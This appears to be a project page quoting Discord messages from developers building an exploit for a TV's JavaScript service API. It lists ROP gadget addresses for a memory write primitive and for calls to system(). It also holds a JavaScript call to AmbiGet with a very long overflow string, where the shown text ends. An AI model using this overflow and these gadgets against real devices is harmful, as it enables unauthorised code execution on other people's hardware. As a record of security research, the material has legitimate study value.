# Discord messages of interest

Development was a mix of text messages and voice chat, but here are some messages to indicate how we progressed over time.

> ok so I found some stuff :^)
> ```
> // write primitive 4bytes
> // looks relatively safe to call (crashes with a 1 deref in strstr)
> PC = 0x23BCC
> R4 = address+0x880
> R11 = data
>
> // system call (SP buffer)
> PC = 0x15F3C or 0x15F70 or 0x15FA4 or 0x15FD8 // (latter = safer)
> R4 = R11 = unused
>
> // system call (R4 buffer)
> // looks super safe
> PC = 0x11D48 or 0x14108
> R4 = address of ascii string for system()
> R11 = unused
>
> // system call (R4 buffer) but probably unsafe
> PC = 0x2F3DC (super unsafe) or 0x2F52C
> R4 = address of ascii string for system()
> R11 = unused
> ```
> these are the useful gadgets
> there seems to be a memory area that stays static between runs, and is in a good address range
> thus it might be possible to use the write primitive to write a buffer for system there
> @Jan4V#0289
> You will still have to catch me up with what I should do though xd
> @Emily | Sunpy#5213
> can you send me the js you have for the AmbiGet?
> I wanna make a nicer setup for this and we can try
> @Jan4V#0289
> ```js
> new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA